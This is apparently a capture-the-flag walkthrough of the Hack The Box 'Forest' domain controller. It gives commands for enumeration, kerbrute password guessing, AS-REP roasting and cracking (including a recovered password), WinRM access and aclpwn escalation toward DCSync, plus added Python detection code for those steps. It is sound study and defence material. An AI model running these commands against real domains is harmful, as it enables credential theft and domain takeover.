Forest 10.10.10.161

Defenders think in lists. Attackers think in graphs. As long as this is true, attackers win. <John Lambert>


Last updated 4 years ago


Owned at 03 Jan 2020

Background

Forest is an "Easy" difficulty Windows machine. It is a Windows Domain Controller (DC) with an Exchange server installed, and it requires DC enumeration techniques and Kerberos knowledge.

Anonymous LDAP binds can be used to access the DC and enumerate domain objects. A service account was found with Kerberos pre-authentication disabled; its AS-REP hash can be cracked offline to gain initial access. This service account was a member of the "Account Operators" group, which can be used to create a privileged Exchange account.

Finally, this privileged account was leveraged to gain DCSync privileges on the domain and dump the NTLM hashes.

Penetration Methodology:

Service Scanning

  • Nmap

Enumeration

  • Kerberos

  • SMB: smbclient, smbmap, enum4linux

  • Ldap: ldapsearch

  • NTLM: impacket/GetNPUsers

Exploitation

  • Password Crack: John

  • SMB connection: impacket/smbexec

Getting Low Privilege Shell

  • Evil-winrm.rb

  • Check vulnerability: sherlock.ps1

  • secretsdump

Walkthrough:

Target machine: 10.10.10.161

Attacking (Hacker) machine: 10.10.14.18

Hacking Process Part 0 – Service Scanning

The target machine IP is 10.10.10.161. Get a basic understanding of the services available on the target machine using an nmap aggressive scan of all ports.

0.1) Quick Pre-searching

nmap 10.10.10.161 (quick scan to get the list of open ports)

0.2) Detailed Analysis

Enumeration strategies

  1. LDAP - Port 389

  2. SMB - Port 135

  3. Kerberos - Port 88

Hacking Process Part 1 – Enumeration

enum4linux 10.10.10.161 (gets the basic information of the target machine)

1.1) Strategy 1 Check port 389 LDAP Enumeration

  • nmap -p 389 --script ldap-rootdse 10.10.10.161

  • ldapsearch -x -h 10.10.10.161 -b "DC=htb,DC=local"

Keep this information for later use

Domain: HTB with the following users

  • HTB\sebastien

  • HTB\lucinda

  • HTB\svc-alfresco

  • HTB\andy

  • HTB\mark

  • HTB\santi

1.2) Strategy 2 - Check SMB

Anonymous SMB login is not allowed; the SMB service is not usable without user credentials.

smbclient -I 10.10.10.161 -L andy

smbmap -R Replication -H 10.10.10.161

1.3) Strategy 3 - Kerberos

Use kerbrute to test the user accounts found above

../../../tools/win/kerbrute/kerbrute.py -domain htb.local -users ./user.list -passwords /usr/share/wordlists/rockyou.txt -outputfile forest_passwords.txt

kerbrute finds that the svc-alfresco account does not require Kerberos pre-authentication. Try to request a TGT for it using GetNPUsers.

Add 10.10.10.161 to the hosts file as htb.local and try again

Cracking AS-REP Hashes with HashCat/John

$krb5asrep$23$svc-alfresco@HTB.LOCAL:3ce79e32b438b810950ea097f50ccedf$63b3f13f672cc9d483230b4c28ea26ff574bd9906b92cd5193d8496b2059ba20d009e50f7f3eed3d5440709e3b45b949ae456f27dd61b58c4e81a70e60c41adf75af3615acdd655455daa8023a9e931e91078e72db14241e8670375052ea5e13d817f328ffc19ca80873b736892fc1b65127d2f3f852eb11cb5749b46bad8fe49349352f9b5995f26f5cd24ea13d446710004a7cd86177206b638cff8f791a8df3a3c3a059c9087a99f18c9f5b21445a306d3695aed15377b3380b4c8b3e431bcf59afedabedf890d4457c38f193d750052f952e0ea746a16e6014615b4afe1fd4a4335fa14d

john --wordlist=/usr/share/wordlists/rockyou.txt alfresco.tgt

python ../../../tools/win/impacket-0.9.20/examples/getTGT.py htb.local/svc-alfresco:s3rvice

john recovers the password of svc-alfresco; getTGT confirms it by obtaining a TGT with that password.
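From the defender's side, the two Kerberos steps above (the kerbrute wordlist run and the AS-REP hash for an account without pre-authentication) each leave a distinct trace in Security event 4768 on the DC. The following is an added example, not part of the original writeup: it audits constructed LDAP entries for the DONT_REQ_PREAUTH flag and runs detection logic over constructed 4768 records (all sample values, IPs and account flags are hypothetical).

```python
# Added example (not part of the original writeup): defender-side checks for the
# AS-REP roasting and kerbrute password-spray steps described above.
DONT_REQ_PREAUTH = 0x400000  # userAccountControl flag "Do not require Kerberos preauthentication"
RC4_HMAC = 0x17              # etype 23, the "$krb5asrep$23$" hash format shown above

# Constructed LDAP entries (values are hypothetical, not the real htb.local ones)
SAMPLE_LDAP = [
    {"sAMAccountName": "sebastien",    "userAccountControl": 0x10200},   # NORMAL_ACCOUNT | DONT_EXPIRE_PASSWD
    {"sAMAccountName": "svc-alfresco", "userAccountControl": 0x410200},  # same, plus DONT_REQ_PREAUTH
    {"sAMAccountName": "andy",         "userAccountControl": 0x10200},
]

# Constructed Security event 4768 (Kerberos TGT requested) records, field names as in the
# Windows event schema. PreAuthType "0" = logon without pre-authentication.
SAMPLE_4768 = [
    {"TargetUserName": "sebastien",    "PreAuthType": "2", "TicketEncryptionType": "0x12", "IpAddress": "10.10.10.161", "Status": "0x0"},
    {"TargetUserName": "svc-alfresco", "PreAuthType": "0", "TicketEncryptionType": "0x17", "IpAddress": "10.10.14.18",  "Status": "0x0"},
    {"TargetUserName": "sebastien",    "PreAuthType": "2", "TicketEncryptionType": "0x17", "IpAddress": "10.10.14.18",  "Status": "0x18"},
    {"TargetUserName": "lucinda",      "PreAuthType": "2", "TicketEncryptionType": "0x17", "IpAddress": "10.10.14.18",  "Status": "0x18"},
    {"TargetUserName": "andy",         "PreAuthType": "2", "TicketEncryptionType": "0x17", "IpAddress": "10.10.14.18",  "Status": "0x18"},
    {"TargetUserName": "mark",         "PreAuthType": "2", "TicketEncryptionType": "0x17", "IpAddress": "10.10.14.18",  "Status": "0x6"},
]

def accounts_without_preauth(entries):
    """Audit: accounts whose userAccountControl has DONT_REQ_PREAUTH set (roastable)."""
    return sorted(e["sAMAccountName"] for e in entries
                  if e["userAccountControl"] & DONT_REQ_PREAUTH)

def detect_asrep_roast(events):
    """Successful TGT requests without pre-auth using RC4: a crackable AS-REP was handed out.
    Returns {source_ip: [accounts]}."""
    hits = {}
    for ev in events:
        if ev["PreAuthType"] == "0" and ev["Status"] == "0x0" \
                and int(ev["TicketEncryptionType"], 16) == RC4_HMAC:
            hits.setdefault(ev["IpAddress"], set()).add(ev["TargetUserName"])
    return {ip: sorted(users) for ip, users in hits.items()}

def detect_spray(events, min_users=3):
    """One source IP failing pre-auth (0x18 bad password, 0x6 unknown principal)
    against many distinct accounts, which is what a kerbrute wordlist run produces."""
    failures = {}
    for ev in events:
        if ev["Status"] in ("0x18", "0x6"):
            failures.setdefault(ev["IpAddress"], set()).add(ev["TargetUserName"])
    return {ip: sorted(u) for ip, u in failures.items() if len(u) >= min_users}

if __name__ == "__main__":
    print("no pre-auth:", accounts_without_preauth(SAMPLE_LDAP))
    print("AS-REP roast:", detect_asrep_roast(SAMPLE_4768))
    print("spray:", detect_spray(SAMPLE_4768))
```

The audit function is the quick fix for this machine: clearing DONT_REQ_PREAUTH on svc-alfresco (or moving it to an AES-only, long-password account) removes the crackable AS-REP entirely.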

Hacking Process Part 2 – Exploitation

2.1) Exploitation

The password of svc-alfresco is confirmed, but the account cannot execute commands over SMB

../../../tools/win/impacket-0.9.20/examples/smbexec.py htb.local/svc-alfresco:s3rvice@10.10.10.161 net user

Hacking Process Part 3 – Getting Low Privilege Access

3.1) WinRM

Test the WinRM (Windows Remote Management) service using the account

evil-winrm.rb

Get the low privilege access, check the flag

Check the svc-alfresco is not the local administrators group

3.2) Enumeration

No vulnerability found by sherlock.ps1

sherlock.ps1

The NTLM hashes cannot be dumped with this account using secretsdump

4.1) Privilege escalation with aclpwn

Objective: from svc-alfresco to HTB.local

Dry run first (-dry only shows the escalation path, without changing anything):

aclpwn -f svc-alfresco -ft user -d htb.local -t htb.local -dry -s 10.10.10.161 -u svc-alfresco -p s3rvice

Then apply the path:

aclpwn -f svc-alfresco -ft user -d htb.local -t htb.local -s 10.10.10.161 -u svc-alfresco -p s3rvice
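The aclpwn path ends with svc-alfresco holding replication rights on the domain and DCSync being used to dump the NTLM hashes (see Background). Exercising those rights is logged as Security event 4662 on the DC, so a defender can catch the final step regardless of how the ACL was modified. The following is an added example, not part of the original writeup: detection logic over constructed 4662 records, with a hypothetical DC allowlist and constructed GUIDs for the non-replication entry.

```python
# Added example (not part of the original writeup): detection for the DCSync step that
# the aclpwn escalation above leads to, run over constructed Security event 4662 records.
import re

# Control-access right GUIDs that together allow directory replication (DCSync).
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
}
# Computer accounts that legitimately replicate (the domain's DCs); hypothetical allowlist.
KNOWN_DCS = {"FOREST$"}

# Constructed 4662 ("An operation was performed on an object") records. Properties holds the
# GUIDs of the rights touched; AccessMask 0x100 = Control Access. The last record uses a
# constructed, non-replication GUID to show a benign object access.
SAMPLE_4662 = [
    {"SubjectUserName": "FOREST$",      "AccessMask": "0x100",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"SubjectUserName": "svc-alfresco", "AccessMask": "0x100",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"SubjectUserName": "andy",         "AccessMask": "0x10",
     "Properties": "{aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee}"},
]

def rights_in(properties):
    """Names of replication rights whose GUIDs appear in a 4662 Properties field."""
    guids = re.findall(r"\{([0-9a-f-]{36})\}", properties.lower())
    return sorted(REPLICATION_RIGHTS[g] for g in guids if g in REPLICATION_RIGHTS)

def detect_dcsync(events, known_dcs=KNOWN_DCS):
    """Replication rights exercised (Control Access) by any principal that is not a known DC.
    Returns [(account, [rights])]; a hit on a user account is a DCSync in progress."""
    alerts = []
    for ev in events:
        if int(ev["AccessMask"], 16) & 0x100 == 0:
            continue
        rights = rights_in(ev["Properties"])
        if rights and ev["SubjectUserName"].upper() not in known_dcs:
            alerts.append((ev["SubjectUserName"], rights))
    return alerts

if __name__ == "__main__":
    for account, rights in detect_dcsync(SAMPLE_4662):
        print(f"DCSync by {account}: {', '.join(rights)}")
```

4662 is only written when the domain object has a SACL auditing Control Access for Everyone, so the SACL is a prerequisite of this detection, not an optional tuning step.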

Conclusion...

Reference Link

What is kerberos and how to attack it.

nmap -p 22,80,443 -A -o nmap-forest.txt 10.10.10.161

https://www.tarlogic.com/en/blog/how-to-attack-kerberos/
https://stealingthe.network/quick-guide-to-installing-bloodhound-in-kali-rolling/
https://securityonline.info/aclpwn/